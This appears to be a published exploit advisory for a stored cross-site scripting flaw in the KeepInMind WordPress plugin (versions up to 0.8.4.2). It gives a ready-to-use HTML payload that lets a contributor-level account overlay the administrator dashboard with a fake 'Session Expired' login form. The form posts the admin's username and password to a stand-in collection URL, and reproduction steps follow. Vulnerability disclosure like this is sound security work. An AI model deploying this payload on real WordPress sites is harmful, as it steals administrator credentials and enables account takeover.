KeepInMind 0.8.4.2 Exploit, Stored XSS

# Exploit Title: KeepInMind 0.8.4.2 -  Stored XSS
# Date: 2026-06-12
# Exploit Author: Pavan N
# Vendor Homepage: https://wordpress.org/plugins/keepinmind-dashboard-notes/
# Software Link: https://downloads.wordpress.org/plugin/keepinmind-dashboard-notes.0.8.4.3.zip
# Version: <= 0.8.4.2
# Tested on: WordPress 6.x / Linux
# CVE: CVE-2026-9271
# CVSS Score: 9.0 (Critical)

1. Technical Description:
The KeepInMind - Dashboard Notes plugin (version 0.8.4.2 and below) fails to properly restrict dangerous CSS properties within the 'wp_kses' sanitization filter when processing the 'content' parameter via its REST API endpoint. Authenticated attackers with Contributor+ privileges can inject custom HTML/CSS utilizing 'position: fixed', 'z-index', and viewport units (vw/vh). When an Administrator views the dashboard, the payload renders globally over the viewport, redressing the UI to spoof a high-fidelity "Session Expired" re-authentication prompt, enabling administrative account takeover.

2. Proof of Concept / Payload Template:
An attacker sends a POST request to the plugin's note-saving REST endpoint with the following HTML payload structure:

<div style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: 999999; background: #f0f0f1;">
    <form action="http://example.com/capture.php" method="POST">
        <h3>Session Expired. Please log in again.</h3>
        <input type="text" name="log" placeholder="Username">
        <input type="password" name="pwd" placeholder="Password">
        <input type="submit" value="Log In">
    </form>
</div>

3. Steps to Reproduce:
a. Log in as a Contributor user.
b. Issue a request to update/create a dashboard note containing the layout-redressing payload.
c. Log in as an Administrator and navigate to the main dashboard page.
d. Observe the entire administrative interface obscured by the injected container.

All rights reserved nPulse.net 2009 - 2026
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD